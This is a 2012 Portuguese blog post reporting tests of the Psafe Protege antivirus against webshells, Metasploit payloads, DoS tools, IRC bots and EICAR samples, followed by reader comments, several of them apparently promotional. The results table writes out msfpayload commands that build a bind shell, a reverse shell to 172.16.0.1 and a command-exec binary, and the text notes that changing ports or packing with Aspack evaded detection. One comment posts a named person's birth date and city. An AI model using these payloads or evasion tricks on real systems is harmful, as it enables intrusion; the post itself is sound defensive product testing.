terça-feira, 7 de agosto de 2012

Resultado dos testes com Psafe Protege AntiVirus


O Psafe Protege mesmo?

Bem, inicialmente gostaria de dizer que esta pesquisa em momento algum quis comparar o Psafe com qualquer outro AV. do mercado.

Detalhe da pesquisa:

Sistema Operacional utilizado: Windows 2003 Server R2
AV: Psafe Protege
Software Adicional: IIS6 (Apenas para testes com webshells)

Abaixo a tabela  com os testes realizados:

WebshellsEncodingExtensao alteradaDetecção na gravação?Detecção na execução?Detecção Manual Scan?
ASPTexto PlanoNãoNãoNãoNão
ASPXTexto PlanoNãoNãoNãoNão
JSPTexto PlanoNãoNãoNãoNão
PerlTexto PlanoNãoNãoNãoNão
PHPTexto PlanoNãoNãoNãoNão
CFMTexto PlanoNãoNãoNãoNão
Executaveis MetaSploitEncodingExtensao alteradaDetecção na gravação?Detecção na execução?Detecção Manual Scan?Comando:
Sample1 Bind na porta 6666NãoNãoNãoNãoNãomsfpayload windows/shell_bind_tcp LPORT=6666 X > /tmp/msf_sample1.exe
Sample 2 Reverse Shell porta 6666NãoNãoNãoNãoNãomsfpayload windows/shell_reverse_tcp LHOST=172.16.0.1 LPORT=6666 X > /tmp/msf_sample2.exe
Sample 3 Arbitrary Command ExecNãoNãoNãoNãoNãomsfpayload windows/exec CMD=calc.exe X > /tmp/msf_sample3.exe
Ferramentas para DoSEncodingExtensao alteradaDetecção na gravação?Detecção na execução?Detecção Manual Scan?
SlowLorisTexto PlanoNãoNãoNãoNão
LoicTexto PlanoNãoNãoNãoNão
IRC Bots (Perl)EncodingExtensao alteradaDetecção na gravação?Detecção na execução?Detecção Manual Scan?
AlphaNix 2.0Texto PlanoNãoNãoNãoNão
ScaneTexto PlanoNãoNãoNãoNão
SexiTexto PlanoNãoNãoNãoNão
ShellbotTexto PlanoNãoNãoNãoNão
Samples EICAR.orgPackingExtensao alteradaDetecção na gravação?Detecção na execução?Detecção Manual Scan?
eicar.comNãoNãoNãoNãoSim
eicar.com.txtNãoSimNãoN \ ASim
eicar_com.zipNãoCompactadoNãoN \ ANão
eicarcom2.zipNãoCompactadoNãoN \ ANão

Os teste foram realizados entre os dias 06 e 07 de agosto, 2012.

No dia 06 o sample1 do MetaSploit não tinha sido encontrado, já no dia, 07 ele foi encontrado(Trojan.Generic) e removido, porém, somente com manual scan. Os binários gerados no Metasploit ao serem executados abriram portas,  realizaram conexões com a internet e executaram comandos e mesmo assim não geraram alertar algum do Psafe. Outro problema grande foi que após a detecção do msf_sample1.exe, geramos novamente, porém, alterando a porta para 6667 e não foi detectado.

Testamos vários malwares voltados a roubo de senhas bancárias e afins, o índice de detecção foi baixo. Dos 35 samples analisados, apenas 7 foram detectados.

Dos detectados, utilizamos o que possui assinatura:  HEUR/Malware.QVM20.Gen para mais alguns testes:

- Não foi detectado na gravação.
- Foi detectado mesmo trocando a extensão.

Ao utilizarmos um compactador de binários simples (Aspack) o malware parou de ser dectado no Scan manual e foi removido apenas o .bak gerado pelo Aspack.

Outro ponto importante, não há verificação de endereços  Web maliciosos, durante a pesquisa visitamos vários sites conhecidos por distribuição de malwares e nenhum alerta foi gerado.

Conclusão:

O AV se mostrou ineficaz em seu propósito, apresentando um baixo índice de detecção de malwares, especialmente os mais populares no Brasil que permitem o acesso a contas bancárias e podem gerar prejuízos diversos para a maioria dos usuários da Internet no País. 

O fato é agravado pela empresa posicionar o seu produto como “o único antivírus completo e totalmente gratuito que existe, podendo levar o usuário doméstico a entender que existe um nível de perfeição quando comparado aos concorrentes, algo que não corresponde a realidade obtida nos testes realizados.  

---------------------------------------------------------------------------------------------------------

Esta pesquisa foi feita em conjunto com  Gabriel Lanzi (Psylon) @gmlnet
Gostaria de agradecer ao Fio (@fiocavallari @BrauvonHacker ) pela ajuda com os Samples e ao amigo   Lincoln Werneck (@lincolnwerneck)  do Instituto Coaliza (@Coaliza) na redação deste post.

52 comentários:

  1. Essa droga não funciona, só detona o computador. Se você instalou sem querer, tá aqui um link que ensina a remover: http://comodesinstalarpsafe.wordpress.com/2014/02/24/como-desinstalar-o-psafe-antivirus/

    ResponderExcluir
  2. Esse antivírus não detecta nada, meu pc ficou cheio de vírus por causa dele. Uma porcaria, péssimo antivírus!

    ResponderExcluir
  3. Nossa, esse av é um ruim, hein. primeiro que instalou no meu pc sem eu nem sequer autorizar, segundo pq deixou a máquina lenta pra caramba.

    ResponderExcluir
  4. Gustavo Furlanetto1 de março de 2014 19:27

    mano, esse psafe instalou aqui do nada, fica subindo uma janelinha chata pra caramba toda hora, e o pc fica travando toda hora. quem instalar isso aí vai passar é raiva.

    ResponderExcluir
  5. Acho desonesto um programa instalar-se sem a minha autorização, como esse Psafe fez.

    ResponderExcluir
  6. É uma droga, esse Psafe! Não protege nada e ainda deixa o computador lento pra caramba. Ódio!!!

    ResponderExcluir
  7. Eu gostei. Usava outro antivírus e o Psafe tirou vários vírus que estavam escondidos no meu computador. Sem contar que ele elimina arquivos, na opção liberar espaço, isso deixou o meu pc bem mais rápido!

    ResponderExcluir
    Respostas
    1. Bom André, eu usava também outro instalei o Psafe no celular e gostei bastante e apartir daí usei no PC, não sei muito bem porque falam que não funciona se comigo funciona bem.

      Excluir
  8. O PSafe fez um bom trabalho na minha máquina, eliminou as ameaças e também tá servindo como um bom acelerador de internet. Eu usei e aprovei.

    ResponderExcluir
  9. Estou utilizando há alguns dias e simplesmente me surpreendi com o resultado obtido. Ele não trabalha mais com co-instalação e sua tecnologia em nuvem não sobrecarrega o pc. Uso ele no modo personalizado que consegue eliminar até arquivos inúteis e maliciosos que vem junto com downloads. Recomendo e aposto.

    ResponderExcluir
  10. Eu tenho e super recomendo! É leve, rápido, faz o computador ficar mais rápido. E é de graça. Nao tem pq nao te-lo instalado!

    ResponderExcluir
  11. Quantos funcionários a psafe pagou pra postar isso ?

    ResponderExcluir
    Respostas
    1. Muito engraçado, Gabriel! Se alguém CRITICAR o PSafe, ótimo é verdade. Mas se alguém ELOGIAR, é porque foi comprado pela empresa... Nesse caso o que vale é a sua opinião. Aprenda a RESPEITAR a opinião dos outros. Se você odeia o PSafe, tem MUITA gente que gosta!

      Excluir
  12. Respostas
    1. http://teamtwforever.blogspot.com.br/p/about-group_1.html

      Full name: James Kevin McGuiness
      Country: United Kingdom
      City: Notthingam
      Date of birth: 24 of July, 1990
      Height: 185 cm
      Hair colour: Brown
      Eyes colour: Blue
      Star sign:Leo
      Favourite band: The Killers

      Me ajuda ai né? Já tão forçando a barra postando com perfis fake!

      Excluir
  13. http://teamtwforever.blogspot.com.br/p/about-group_1.html

    Full name: James Kevin McGuiness
    Country: United Kingdom
    City: Notthingam
    Date of birth: 24 of July, 1990
    Height: 185 cm
    Hair colour: Brown
    Eyes colour: Blue
    Star sign:Leo
    Favourite band: The Killers

    Me ajuda ai né? Já tão forçando a barra postando com perfis fake!

    ResponderExcluir
  14. Isso é crime , falsidade ideológica !!

    ResponderExcluir
  15. Acho q vale a pena uma nova avaliação. A versão nova eu achei OK. É só deixar a "lenda" da mula-sem-cabeça pra trás e dar um voto de confiança. Dos de grátis eu achei o melhor e mais intuitivo q o avast, q enche o saco por causa do trial e expiração....

    ResponderExcluir
  16. Concordo com o Beto, acho que é válida uma nova avaliação, se comparando com a versão antiga, já tive ela e hoje tenho a atual que tem bem menos propaganda, e qualidade de proteção aumentou

    ResponderExcluir
  17. Sempre leio que muita gente teve problemas com a Psafe no passado mas o anti vírus que passei a usar esse ano (2014) nunca deu erro, pelo contrário, foi uma grande solução no momento.

    ResponderExcluir
    Respostas
    1. Eu também já tive problemas com a psafe no passado, mas resolvi baixar de novo e tudo mudou, estou adorando o novo sistema deles e hoje em dia estou muito satisfeita!!

      Excluir
  18. Eu tinha essa visão antes, porque eu tinha escutado muitas pessoas que não estavam satisfeitas, mas acabei experimentando o antivírus da PSafe. Eu gostei bastante e meu computador ficou mais rápido.

    ResponderExcluir
  19. Eu comecei a usar há pouco tempo e tô gostando! Ainda não entendo muito dessas coisas, mas é importante se proteger, né.

    ResponderExcluir
  20. eu também já escutei muita coisa negativa do antivírus mas nunca tive o que reclamar, tem menos propaganda, e deixa bem mais rápido o meu pc, mais fácil do que todos que já usei.

    ResponderExcluir
  21. Também não entendi esse resultado. Uso no meu computador e no meu celular há bastante tempo e o resultado sempre foi muito bom.

    ResponderExcluir
    Respostas
    1. Eu também uso e não tenho do que reclamar..

      Excluir
  22. Interessante... jah ouvi tanta coisa, mas gosto do psafe..... o app pra android me ajuda bastante....

    ResponderExcluir
  23. Tinha um povo ai falando que o PSafe instala do nada... queria saber onde eles viram isso...Eu instalei por indicação e nada tenho a falar dele. Muito pelo contrário, eu adoro as funções de antivírus e ainda uso o antifurto e cofre...

    ResponderExcluir
  24. ñ tenho do q relcamar do psafe... uso no meu cel e acho bem pratico... e ainda dá pra baixar apps por ele com segurança...

    ResponderExcluir
  25. por enquanto to suave com esse psafe pq acho maior boi pra mexer.. a maioria dos apps de segurança é meio embaçado de mexer... sei lá, por enquanto to gostando

    ResponderExcluir
  26. toh gostando do psafe... acho ele bem pratico e me adaptei bem.....

    ResponderExcluir
  27. Concordo com o Clayton. Mesmo não tendo ninguém pra me ajudar, consigo mexer no PSafe e resolver sozinha o problema do meu computador, coisa que não acontecia com outros antivírus.

    ResponderExcluir
  28. Gosto do PSafe pq é grátis, não tem aquela coisa chata de pedir pra renovar a cada 30 dias. Isso era muito irritante rs

    ResponderExcluir
  29. Eu uso a Psafe a algumas semanas no meu PC , e oque me deixa mais satisfeita e pelo fato de ser Grátis... e ter um suporte brasileiro. então, acho que tem isso como peso a mais na questão de preferencia para mim.

    ResponderExcluir
  30. Bom... estou vendo que o teste é antigo. Acredito que deva ter tido alguma atualização/melhora no programa. Tenho o meu instalada há alguns meses e está tudo funcionando bem, o computador está limpo. Acho muito bom não ter que renovar toda hora. Ele é permanente no meu computador e gratuito.
    Laura Matos

    ResponderExcluir
  31. Bom, eu tenho usado já alguns meses e tem dado resultados,
    foi a solução para os meus problemas.
    Uso e recomendo.

    ResponderExcluir
  32. primeiro eu conheci o aplicativo do android e achei mt bom e baixei o antivirus, foi otimo pq deixei de pagar e troquei pelo da psafe q tem a mesma qualidade, nao me arrependi.

    ResponderExcluir
  33. Eu não estava satisfeito com o meu anti vírus antigo, e fui pesquisar outro, vi muitos comentários positivos e negativos tbm sobre a psafe mas resolvi testar e acabei gostando, achei bem completo pra um gratuito.

    ResponderExcluir
  34. Estou satisfeita com esse antivírus, o melhor de tudo ele é grátis.

    ResponderExcluir
  35. Não conheço a versão antiga, mas essa nova por enquanto eu ñ tenho problema algum, pelo contrário, acho simples de mexer e tem suporte

    ResponderExcluir
  36. Bom não entendo muito dessa parte tecnológica, mas desde que comecei a usar o PSafe me sinto cada vez mais segura.

    ResponderExcluir
  37. Meu computador parou de travar depois que instalei o PSafe..

    ResponderExcluir
  38. Usava AVG e troquei pro psafe. Meu computador ficou muito mais rápido e tô gostando dele.

    ResponderExcluir
  39. Tenho o PSafe instalado e acho super prático de usar..

    ResponderExcluir
  40. Eu estou usando no momento esse Antivirus da psafe . e não estou tendo problemas. gosto também porque e nacional... as atualizações são rápidas .espero que continue assim .

    ResponderExcluir
  41. Pra quem não entende muito de tecnologia que nem eu sugiro esse Psafe pois é muito fácil de lidar com ele, por ser intuitivo de configurar...

    ResponderExcluir
  42. Baixei esse app no celular, e vi o quanto é pratico, antes pagava por antivírus no pc, agora uso ele, grátis e eficaz.

    ResponderExcluir
  43. Eu não conheço o antivírus para o pc, mas a versão para celular dele é muito boa, uso e já detectou alguns vírus e ameaças.

    ResponderExcluir
  44. Eu estava com um virus danado no meu Computador e a droga do AVG nem via. Não é que o PSAF viu e deletou?

    ResponderExcluir
  45. Eu uso o PSafe no PC e no meu celular. Acho simplesmente ótimo! Pode ser que no início teve problemas, mas eu utilizo desde 2014, e na minha opinião é o melhor.

    ResponderExcluir